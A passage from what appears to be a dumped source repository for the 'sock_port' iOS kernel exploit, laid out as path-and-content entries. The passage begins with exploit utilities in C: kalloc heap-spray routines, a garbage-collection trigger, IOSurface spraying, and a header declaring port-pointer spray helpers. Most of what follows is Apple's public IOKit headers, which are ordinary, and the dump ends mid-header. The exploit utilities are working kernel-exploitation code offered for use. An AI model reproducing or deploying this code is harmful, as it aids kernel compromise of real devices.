mach_msg(&msg->hdr,\n MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n msg_size,\n 0,\n MACH_PORT_NULL,\n MACH_MSG_TIMEOUT_NONE,\n MACH_PORT_NULL);\n \n if (err != KERN_SUCCESS) {\n printf(\"IOSurface: failed to send message %x (%d): %s\\n\", err, i, mach_error_string(err));\n return MACH_PORT_NULL;\n }\n }\n \n return q;\n}\n\n// rest is from machswap\nvoid trigger_gc() {\n const int gc_ports_cnt = 100;\n int gc_ports_max = gc_ports_cnt;\n mach_port_t gc_ports[gc_ports_cnt] = { 0 };\n \n uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024\n uint8_t *body = (uint8_t*)malloc(body_size);\n memset(body, 0x41, body_size);\n \n for (int i = 0; i < gc_ports_cnt; i++) {\n uint64_t t0, t1;\n \n t0 = mach_absolute_time();\n gc_ports[i] = send_kalloc_message(body, body_size);\n t1 = mach_absolute_time();\n \n if (t1 - t0 > 1000000) {\n printf(\"IOSurface: got gc at %d -- breaking\\n\", i);\n gc_ports_max = i;\n break;\n }\n }\n \n for (int i = 0; i < gc_ports_max; i++) {\n mach_port_destroy(mach_task_self(), gc_ports[i]);\n }\n \n sched_yield();\n sleep(1);\n}\n\nmach_vm_size_t pagesize = 0;\n\nconst uint64_t IOSURFACE_CREATE_SURFACE = 0;\nconst uint64_t IOSURFACE_SET_VALUE = 9;\nconst uint64_t IOSURFACE_GET_VALUE = 10;\nconst uint64_t IOSURFACE_DELETE_VALUE = 11;\n\nint init_IOSurface() {\n kern_return_t ret = KERN_SUCCESS;\n\n ret = _host_page_size(mach_host_self(), (vm_size_t*)&pagesize);\n printf(\"IOSurface: The page size is: 0x%llx, %s\\n\", pagesize, mach_error_string(ret));\n if (ret != KERN_SUCCESS) {\n printf(\"IOSurface: Failed to get page size! ret: %x %s\\n\", ret, mach_error_string(ret));\n return ret;\n }\n return !IOSurface_init();\n}\n\nvoid deinit_IOSurface() {\n IOSurface_deinit();\n}\n\nint spray_IOSurface(void *data, size_t size) {\n return !IOSurface_spray_with_gc(32, 256, data, (uint32_t)size, NULL);\n}\n" }, { "path": "Exploits/sock_port/exploit_utilities.h", "content": "//\n// exploit_utilities.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#ifndef exploit_utilities_h\n#define exploit_utilities_h\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \"../sock_port/include/IOKit/IOKitLib.h\"\n#include \n\n#include \"iosurface.h\"\n\nstruct ool_msg {\n mach_msg_header_t hdr;\n mach_msg_body_t body;\n mach_msg_ool_ports_descriptor_t ool_ports;\n};\n\nstruct simple_msg {\n mach_msg_header_t hdr;\n char buf[0];\n};\n\nsize_t message_size_for_kalloc_size(size_t kalloc_size);\nmach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition);\nmach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size);\nvoid trigger_gc(void);\n\nenum {\n kIOCFSerializeToBinary = 0x00000001U,\n};\n\n#define kOSSerializeBinarySignature 0x000000D3U\n\nenum {\n kOSSerializeDictionary = 0x01000000U,\n kOSSerializeArray = 0x02000000U,\n kOSSerializeSet = 0x03000000U,\n kOSSerializeNumber = 0x04000000U,\n kOSSerializeSymbol = 0x08000000U,\n kOSSerializeString = 0x09000000U,\n kOSSerializeData = 0x0a000000U,\n kOSSerializeBoolean = 0x0b000000U,\n kOSSerializeObject = 0x0c000000U,\n \n kOSSerializeTypeMask = 0x7F000000U,\n kOSSerializeDataMask = 0x00FFFFFFU,\n \n kOSSerializeEndCollection = 0x80000000U,\n \n kOSSerializeMagic = 0x000000d3U,\n};\n\nextern mach_vm_size_t pagesize;\n\nextern const uint64_t IOSURFACE_CREATE_SURFACE;\nextern const uint64_t IOSURFACE_SET_VALUE;\nextern const uint64_t IOSURFACE_GET_VALUE;\nextern const uint64_t IOSURFACE_DELETE_VALUE;\n\nint init_IOSurface(void);\nvoid deinit_IOSurface(void);\nint spray_IOSurface(void *data, size_t size);\n\n#endif /* exploit_utilities_h */\n" }, { "path": "Exploits/sock_port/include/IOKit/IOKitKeys.h", "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. \n *\n * Common symbol definitions for IOKit. \n *\n * HISTORY\n *\n */\n\n\n#ifndef _IOKIT_IOKITKEYS_H\n#define _IOKIT_IOKITKEYS_H\n\n// properties found in the registry root\n#define kIOKitBuildVersionKey\t\t\"IOKitBuildVersion\"\n#define kIOKitDiagnosticsKey\t\t\"IOKitDiagnostics\"\n\t// a dictionary keyed by plane name\n#define kIORegistryPlanesKey\t\t\"IORegistryPlanes\"\n#define kIOCatalogueKey\t\t\t\"IOCatalogue\"\n\n// registry plane names\n#define kIOServicePlane\t\t\t\"IOService\"\n#define kIOPowerPlane\t\t\t\"IOPower\"\n#define kIODeviceTreePlane\t\t\"IODeviceTree\"\n#define kIOAudioPlane\t\t\t\"IOAudio\"\n#define kIOFireWirePlane\t\t\"IOFireWire\"\n#define kIOUSBPlane\t\t\t\"IOUSB\"\n\n// registry ID number\n#define kIORegistryEntryIDKey\t\t\"IORegistryEntryID\"\n\n// IOService class name\n#define kIOServiceClass\t\t\t\"IOService\"\n\n// IOResources class name\n#define kIOResourcesClass\t\t\"IOResources\"\n\n// IOService driver probing property names\n#define kIOClassKey\t\t\t\"IOClass\"\n#define kIOProbeScoreKey\t\t\"IOProbeScore\"\n#define kIOKitDebugKey\t\t\t\"IOKitDebug\"\n\n// IOService matching property names\n#define kIOProviderClassKey\t\t\"IOProviderClass\"\n#define kIONameMatchKey\t\t\t\"IONameMatch\"\n#define kIOPropertyMatchKey\t\t\"IOPropertyMatch\"\n#define kIOPathMatchKey\t\t\t\"IOPathMatch\"\n#define kIOLocationMatchKey\t\t\"IOLocationMatch\"\n#define kIOParentMatchKey\t\t\"IOParentMatch\"\n#define kIOResourceMatchKey\t\t\"IOResourceMatch\"\n#define kIOMatchedServiceCountKey\t\"IOMatchedServiceCountMatch\"\n\n#define kIONameMatchedKey\t\t\"IONameMatched\"\n\n#define kIOMatchCategoryKey\t\t\"IOMatchCategory\"\n#define kIODefaultMatchCategoryKey\t\"IODefaultMatchCategory\"\n\n// IOService default user client class, for loadable user clients\n#define kIOUserClientClassKey\t\t\"IOUserClientClass\"\n\n// key to find IOMappers\n#define kIOMapperIDKey\t\t\t\t\"IOMapperID\"\n\n#define kIOUserClientCrossEndianKey\t\t\"IOUserClientCrossEndian\"\n#define kIOUserClientCrossEndianCompatibleKey\t\"IOUserClientCrossEndianCompatible\"\n#define kIOUserClientSharedInstanceKey\t\t\"IOUserClientSharedInstance\"\n// diagnostic string describing the creating task\n#define kIOUserClientCreatorKey\t\t\"IOUserClientCreator\"\n\n// IOService notification types\n#define kIOPublishNotification\t\t\"IOServicePublish\"\n#define kIOFirstPublishNotification\t\"IOServiceFirstPublish\"\n#define kIOMatchedNotification\t\t\"IOServiceMatched\"\n#define kIOFirstMatchNotification\t\"IOServiceFirstMatch\"\n#define kIOTerminatedNotification\t\"IOServiceTerminate\"\n\n// IOService interest notification types\n#define kIOGeneralInterest\t\t\"IOGeneralInterest\"\n#define kIOBusyInterest\t\t\t\"IOBusyInterest\"\n#define kIOAppPowerStateInterest\t\"IOAppPowerStateInterest\"\n#define kIOPriorityPowerStateInterest\t\"IOPriorityPowerStateInterest\"\n\n#define kIOPlatformDeviceMessageKey \"IOPlatformDeviceMessage\"\n\n// IOService interest notification types\n#define kIOCFPlugInTypesKey\t\t\"IOCFPlugInTypes\"\n\n// properties found in services that implement command pooling\n#define kIOCommandPoolSizeKey\t \"IOCommandPoolSize\" // (OSNumber)\n\n// properties found in services that have transfer constraints\n#define kIOMaximumBlockCountReadKey \"IOMaximumBlockCountRead\" // (OSNumber)\n#define kIOMaximumBlockCountWriteKey \"IOMaximumBlockCountWrite\" // (OSNumber)\n#define kIOMaximumByteCountReadKey \"IOMaximumByteCountRead\" // (OSNumber)\n#define kIOMaximumByteCountWriteKey \"IOMaximumByteCountWrite\" // (OSNumber)\n#define kIOMaximumSegmentCountReadKey \"IOMaximumSegmentCountRead\" // (OSNumber)\n#define kIOMaximumSegmentCountWriteKey \"IOMaximumSegmentCountWrite\" // (OSNumber)\n#define kIOMaximumSegmentByteCountReadKey \"IOMaximumSegmentByteCountRead\" // (OSNumber)\n#define kIOMaximumSegmentByteCountWriteKey \"IOMaximumSegmentByteCountWrite\" // (OSNumber)\n#define kIOMinimumSegmentAlignmentByteCountKey \"IOMinimumSegmentAlignmentByteCount\" // (OSNumber)\n#define kIOMaximumSegmentAddressableBitCountKey \"IOMaximumSegmentAddressableBitCount\" // (OSNumber)\n\n// properties found in services that wish to describe an icon\n//\n// IOIcon = \n// {\n// CFBundleIdentifier = \"com.example.driver.example\";\n// IOBundleResourceFile = \"example.icns\";\n// };\n//\n// where IOBundleResourceFile is the filename of the resource\n\n#define kIOIconKey \"IOIcon\" // (OSDictionary)\n#define kIOBundleResourceFileKey \"IOBundleResourceFile\" // (OSString)\n\n#define kIOBusBadgeKey \"IOBusBadge\" // (OSDictionary)\n#define kIODeviceIconKey \"IODeviceIcon\" // (OSDictionary)\n\n// property of root that describes the machine's serial number as a string\n#define kIOPlatformSerialNumberKey\t\"IOPlatformSerialNumber\"\t// (OSString)\n\n// property of root that describes the machine's UUID as a string\n#define kIOPlatformUUIDKey\t\"IOPlatformUUID\"\t// (OSString)\n\n// IODTNVRAM property keys\n#define kIONVRAMDeletePropertyKey\t\"IONVRAM-DELETE-PROPERTY\"\n#define kIODTNVRAMPanicInfoKey\t\t\"aapl,panic-info\"\n\n// keys for complex boot information\n#define kIOBootDeviceKey \"IOBootDevice\"\t\t// dict | array of dicts\n#define kIOBootDevicePathKey \"IOBootDevicePath\"\t// arch-neutral OSString\n#define kIOBootDeviceSizeKey \"IOBootDeviceSize\"\t// OSNumber of bytes\n\n// keys for OS Version information\n#define kOSBuildVersionKey\t\t\"OS Build Version\"\n\n#endif /* ! _IOKIT_IOKITKEYS_H */\n" }, { "path": "Exploits/sock_port/include/IOKit/IOKitLib.h", "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * The contents of this file constitute Original Code as defined in and\n * are subject to the Apple Public Source License Version 1.1 (the\n * \"License\"). You may not use this file except in compliance with the\n * License. Please obtain a copy of the License at\n * http://www.apple.com/publicsource and read it before using this file.\n * \n * This Original Code and all software distributed under the License are\n * distributed on an \"AS IS\" basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT. Please see the\n * License for the specific language governing rights and limitations\n * under the License.\n * \n * @APPLE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n *\n */\n\n/*\n * IOKit user library\n */\n\n#ifndef _IOKIT_IOKITLIB_H\n#define _IOKIT_IOKITLIB_H\n\n#ifdef KERNEL\n#error This file is not for kernel use\n#endif\n\n#include \n#include \n\n#include \n#include \n\n#include \n#include \n#include \n\n#include \"IOTypes.h\"\n#include \"IOKitKeys.h\"\n\n#include \"OSMessageNotification.h\"\n\n#include \n\n__BEGIN_DECLS\n\n/*! @header IOKitLib\nIOKitLib implements non-kernel task access to common IOKit object types - IORegistryEntry, IOService, IOIterator etc. These functions are generic - families may provide API that is more specific.
\nIOKitLib represents IOKit objects outside the kernel with the types io_object_t, io_registry_entry_t, io_service_t, & io_connect_t. Function names usually begin with the type of object they are compatible with - eg. IOObjectRelease can be used with any io_object_t. Inside the kernel, the c++ class hierarchy allows the subclasses of each object type to receive the same requests from user level clients, for example in the kernel, IOService is a subclass of IORegistryEntry, which means any of the IORegistryEntryXXX functions in IOKitLib may be used with io_service_t's as well as io_registry_t's. There are functions available to introspect the class of the kernel object which any io_object_t et al. represents.\nIOKit objects returned by all functions should be released with IOObjectRelease.\n*/\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\ntypedef struct IONotificationPort * IONotificationPortRef;\n\n\n/*! @typedef IOServiceMatchingCallback\n @abstract Callback function to be notified of IOService publication.\n @param refcon The refcon passed when the notification was installed.\n @param iterator The notification iterator which now has new objects.\n*/\ntypedef void\n(*IOServiceMatchingCallback)(\n\tvoid *\t\t\trefcon,\n\tio_iterator_t\t\titerator );\n\n/*! @typedef IOServiceInterestCallback\n @abstract Callback function to be notified of changes in state of an IOService.\n @param refcon The refcon passed when the notification was installed.\n @param service The IOService whose state has changed.\n @param messageType A messageType enum, defined by IOKit/IOMessage.h or by the IOService's family.\n @param messageArgument An argument for the message, dependent on the messageType.\n*/\n\ntypedef void\n(*IOServiceInterestCallback)(\n\tvoid *\t\t\trefcon,\n\tio_service_t\t\tservice,\n\tuint32_t\t\tmessageType,\n\tvoid *\t\t\tmessageArgument );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @const kIOMasterPortDefault\n @abstract The default mach port used to initiate communication with IOKit.\n @discussion When specifying a master port to IOKit functions, the NULL argument indicates \"use the default\". This is a synonym for NULL, if you'd rather use a named constant.\n*/\n\nextern\nconst mach_port_t kIOMasterPortDefault;\n\n/*! @function IOMasterPort\n @abstract Returns the mach port used to initiate communication with IOKit.\n @discussion Functions that don't specify an existing object require the IOKit master port to be passed. This function obtains that port.\n @param bootstrapPort Pass MACH_PORT_NULL for the default.\n @param masterPort The master port is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOMasterPort( mach_port_t\tbootstrapPort,\n\t mach_port_t *\tmasterPort );\n\n\n/*! @function IONotificationPortCreate\n @abstract Creates and returns a notification object for receiving IOKit notifications of new devices or state changes.\n @discussion Creates the notification object to receive notifications from IOKit of new device arrivals or state changes. The notification object can be supply a CFRunLoopSource, or mach_port_t to be used to listen for events.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @result A reference to the notification object. */\n\nIONotificationPortRef\nIONotificationPortCreate(\n\tmach_port_t\t\tmasterPort );\n\n/*! @function IONotificationPortDestroy\n @abstract Destroys a notification object created with IONotificationPortCreate.\n @param notify A reference to the notification object. */\n\nvoid\nIONotificationPortDestroy(\n\tIONotificationPortRef\tnotify );\n\n/*! @function IONotificationPortGetRunLoopSource\n @abstract Returns a CFRunLoopSource to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a CFRunLoop client by adding the run loop source returned by this function to the run loop.\n @param notify The notification object.\n @result A CFRunLoopSourceRef for the notification object. */\n\nCFRunLoopSourceRef\nIONotificationPortGetRunLoopSource(\n\tIONotificationPortRef\tnotify );\n\n/*! @function IONotificationPortGetMachPort\n @abstract Returns a mach_port to be used to listen for notifications.\n @discussion A notification object may deliver notifications to a mach messaging client if they listen for messages on the port obtained from this function. Callbacks associated with the notifications may be delivered by calling IODispatchCalloutFromMessage with messages received \n @param notify The notification object.\n @result A mach_port for the notification object. */\n\nmach_port_t\nIONotificationPortGetMachPort(\n\tIONotificationPortRef\tnotify );\n\n/*! @function IODispatchCalloutFromMessage\n @abstract Dispatches callback notifications from a mach message.\n @discussion A notification object may deliver notifications to a mach messaging client, which should call this function to generate the callbacks associated with the notifications arriving on the port.\n @param unused Not used, set to zero.\n @param msg A pointer to the message received.\n @param reference Pass the IONotificationPortRef for the object. */\n\nvoid\nIODispatchCalloutFromMessage(\n void \t\t\t*unused,\n mach_msg_header_t\t*msg,\n void\t\t\t*reference );\n\n/*! @function IOCreateReceivePort\n @abstract Creates and returns a mach port suitable for receiving IOKit messages of the specified type.\n @discussion In the future IOKit may use specialized messages and ports\n instead of the standard ports created by mach_port_allocate(). Use this\n function instead of mach_port_allocate() to ensure compatibility with future\n revisions of IOKit.\n @param msgType Type of message to be sent to this port\n (kOSNotificationMessageID or kOSAsyncCompleteMessageID)\n @param recvPort The created port is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOCreateReceivePort( uint32_t msgType, mach_port_t * recvPort );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOObject\n */\n\n/*! @function IOObjectRelease\n @abstract Releases an object handle previously returned by IOKitLib.\n @discussion All objects returned by IOKitLib should be released with this function when access to them is no longer needed. Using the object after it has been released may or may not return an error, depending on how many references the task has to the same object in the kernel.\n @param object The IOKit object to release.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRelease(\n\tio_object_t\tobject );\n\n/*! @function IOObjectRetain\n @abstract Retains an object handle previously returned by IOKitLib.\n @discussion Gives the caller an additional reference to an existing object handle previously returned by IOKitLib.\n @param object The IOKit object to retain.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectRetain(\n\tio_object_t\tobject );\n\n/*! @function IOObjectGetClass\n @abstract Return the class name of an IOKit object.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the class the object is an instance of.\n @param object The IOKit object.\n @param className Caller allocated buffer to receive the name string.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOObjectGetClass(\n\tio_object_t\tobject,\n\tio_name_t\tclassName );\n\t\n/*! @function CFStringRef IOObjectCopyClass\n @abstract Return the class name of an IOKit object.\n\t@discussion This function does the same thing as IOObjectGetClass, but returns the result as a CFStringRef.\n\t@param object The IOKit object.\n\t@result The resulting CFStringRef. This should be released by the caller. If a valid object is not passed in, then NULL is returned.*/\n\t\nCFStringRef \nIOObjectCopyClass(io_object_t object)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function CFStringRef IOObjectCopySuperclassForClass\n @abstract Return the superclass name of the given class.\n @discussion This function uses the OSMetaClass system in the kernel to derive the name of the superclass of the class.\n\t@param classname The name of the class as a CFString.\n\t@result The resulting CFStringRef. This should be released by the caller. If there is no superclass, or a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef \nIOObjectCopySuperclassForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function CFStringRef IOObjectCopyBundleIdentifierForClass\n @abstract Return the bundle identifier of the given class.\n\t@discussion This function uses the OSMetaClass system in the kernel to derive the name of the kmod, which is the same as the bundle identifier.\n\t@param classname The name of the class as a CFString.\n\t@result The resulting CFStringRef. This should be released by the caller. If a valid class name is not passed in, then NULL is returned.*/\n\nCFStringRef \nIOObjectCopyBundleIdentifierForClass(CFStringRef classname)\nAVAILABLE_MAC_OS_X_VERSION_10_4_AND_LATER;\n\n/*! @function IOObjectConformsTo\n @abstract Performs an OSDynamicCast operation on an IOKit object.\n @discussion This function uses the OSMetaClass system in the kernel to determine if the object will dynamic cast to a class, specified as a C-string. In other words, if the object is of that class or a subclass.\n @param object An IOKit object.\n @param className The name of the class, as a C-string.\n @result If the object handle is valid, and represents an object in the kernel that dynamic casts to the class true is returned, otherwise false. */\n\nboolean_t\nIOObjectConformsTo(\n\tio_object_t\tobject,\n\tconst io_name_t\tclassName );\n\n/*! @function IOObjectIsEqualTo\n @abstract Checks two object handles to see if they represent the same kernel object.\n @discussion If two object handles are returned by IOKitLib functions, this function will compare them to see if they represent the same kernel object.\n @param object An IOKit object.\n @param anObject Another IOKit object.\n @result If both object handles are valid, and represent the same object in the kernel true is returned, otherwise false. */\n\nboolean_t\nIOObjectIsEqualTo(\n\tio_object_t\tobject,\n\tio_object_t\tanObject );\n\n/*! @function IOObjectGetRetainCount\n @abstract Returns kernel retain count of an IOKit object.\n @discussion This function may be used in diagnostics to determine the current retain count of the kernel object.\n @param object An IOKit object.\n @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetRetainCount(\n\tio_object_t\tobject );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOIterator, subclass of IOObject\n */\n\n/*! @function IOIteratorNext\n @abstract Returns the next object in an iteration.\n @discussion This function returns the next object in an iteration, or zero if no more remain or the iterator is invalid.\n @param iterator An IOKit iterator handle.\n @result If the iterator handle is valid, the next element in the iteration is returned, otherwise zero is returned. The element should be released by the caller when it is finished. */\n\nio_object_t\nIOIteratorNext(\n\tio_iterator_t\titerator );\n\n/*! @function IOIteratorReset\n @abstract Resets an iteration back to the beginning.\n @discussion If an iterator is invalid, or if the caller wants to start over, IOIteratorReset will set the iteration back to the beginning.\n @param iterator An IOKit iterator handle. */\n\nvoid\nIOIteratorReset(\n\tio_iterator_t\titerator );\n\n/*! @function IOIteratorIsValid\n @abstract Checks an iterator is still valid.\n @discussion Some iterators will be made invalid if changes are made to the structure they are iterating over. This function checks the iterator is still valid and should be called when IOIteratorNext returns zero. An invalid iterator can be reset and the iteration restarted.\n @param iterator An IOKit iterator handle.\n @result True if the iterator handle is valid, otherwise false is returned. */\n\nboolean_t\nIOIteratorIsValid(\n\tio_iterator_t\titerator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService, subclass of IORegistryEntry\n */\n\n/*!\n @function IOServiceGetMatchingService\n @abstract Look up a registered IOService object that matches a matching dictionary.\n @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n @result The first service matched is returned on success. The service must be released by the caller.\n */\n\nio_service_t\nIOServiceGetMatchingService(\n\tmach_port_t\tmasterPort,\n\tCFDictionaryRef\tmatching );\n\n/*! @function IOServiceGetMatchingServices\n @abstract Look up registered IOService objects that match a matching dictionary.\n @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n @param existing An iterator handle is returned on success, and should be released by the caller when the iteration is finished.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetMatchingServices(\n\tmach_port_t\tmasterPort,\n\tCFDictionaryRef\tmatching,\n\tio_iterator_t * existing );\n\n\nkern_return_t\nIOServiceAddNotification(\n\tmach_port_t\tmasterPort,\n\tconst io_name_t\tnotificationType,\n\tCFDictionaryRef\tmatching,\n\tmach_port_t\twakePort,\n\tuintptr_t\treference,\n\tio_iterator_t *\tnotification ) DEPRECATED_ATTRIBUTE;\n\n/*! @function IOServiceAddMatchingNotification\n @abstract Look up registered IOService objects that match a matching dictionary, and install a notification request of new IOServices that match.\n @discussion This is the preferred method of finding IOService objects that may arrive at any time. The type of notification specifies the state change the caller is interested in, on IOService's that match the match dictionary. Notification types are identified by name, and are defined in IOKitKeys.h. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the armed notification is fired. When the notification is delivered, the io_iterator_t representing the notification should be iterated through to pick up all outstanding objects. When the iteration is finished the notification is rearmed. See IONotificationPortCreate.\n @param notificationType A notification type from IOKitKeys.h\n
\tkIOPublishNotification Delivered when an IOService is registered.\n
\tkIOFirstPublishNotification Delivered when an IOService is registered, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n
\tkIOMatchedNotification Delivered when an IOService has had all matching drivers in the kernel probed and started.\n
\tkIOFirstMatchNotification Delivered when an IOService has had all matching drivers in the kernel probed and started, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n
\tkIOTerminatedNotification Delivered after an IOService has been terminated.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n @param callback A callback function called when the notification fires.\n @param refCon A reference constant for the callbacks use.\n @param notification An iterator handle is returned on success, and should be released by the caller when the notification is to be destroyed. The notification is armed when the iterator is emptied by calls to IOIteratorNext - when no more objects are returned, the notification is armed. Note the notification is not armed when first created.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceAddMatchingNotification(\n\tIONotificationPortRef\tnotifyPort,\n\tconst io_name_t\t\tnotificationType,\n\tCFDictionaryRef\t\tmatching,\n IOServiceMatchingCallback callback,\n void *\t\t\trefCon,\n\tio_iterator_t * \tnotification );\n\n/*! @function IOServiceAddInterestNotification\n @abstract Register for notification of state changes in an IOService.\n @discussion IOService objects deliver notifications of their state changes to their clients via the IOService::message API, and to other interested parties including callers of this function. Message type s are defined IOKit/IOMessage.h.\n @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the notification is fired. See IONotificationPortCreate.\n @param interestType A notification type from IOKitKeys.h\n
\tkIOGeneralInterest General state changes delivered via the IOService::message API.\n
\tkIOBusyInterest Delivered when the IOService changes its busy state to or from zero. The message argument contains the new busy state causing the notification.\n @param callback A callback function called when the notification fires, with messageType and messageArgument for the state change.\n @param refCon A reference constant for the callbacks use.\n @param notification An object handle is returned on success, and should be released by the caller when the notification is to be destroyed.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceAddInterestNotification(\n\tIONotificationPortRef\tnotifyPort,\n io_service_t\t\tservice,\n\tconst io_name_t \tinterestType,\n IOServiceInterestCallback callback,\n void *\t\t\trefCon,\n io_object_t *\t\tnotification );\n\n/*! @function IOServiceMatchPropertyTable\n @abstract Match an IOService objects with matching dictionary.\n @discussion This function calls the matching method of an IOService object and returns the boolean result.\n @param service The IOService object to match.\n @param matching A CF dictionary containing matching information. IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching, IOOpenFirmwarePathMatching.\n @param matches The boolean result is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceMatchPropertyTable(\n io_service_t\tservice,\n CFDictionaryRef matching,\n boolean_t *\tmatches );\n\n/*! @function IOServiceGetBusyState\n @abstract Returns the busyState of an IOService.\n @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients.\n @param service The IOService whose busyState to return.\n @param busyState The busyState count is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetBusyState(\n\tio_service_t service,\n\tuint32_t *\tbusyState );\n\n/*! @function IOServiceWaitQuiet\n @abstract Wait for an IOService's busyState to be zero.\n @discussion Blocks the caller until an IOService is non busy, see IOServiceGetBusyState.\n @param service The IOService wait on.\n @param waitTime Specifies a maximum time to wait.\n @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOServiceWaitQuiet(\n\tio_service_t service,\n\tmach_timespec_t * waitTime );\n\n/*! @function IOKitGetBusyState\n @abstract Returns the busyState of all IOServices.\n @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients. IOKitGetBusyState returns the busy state of the root of the service plane which reflects the busy state of all IOServices.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param busyState The busyState count is returned.\n @result A kern_return_t error code. 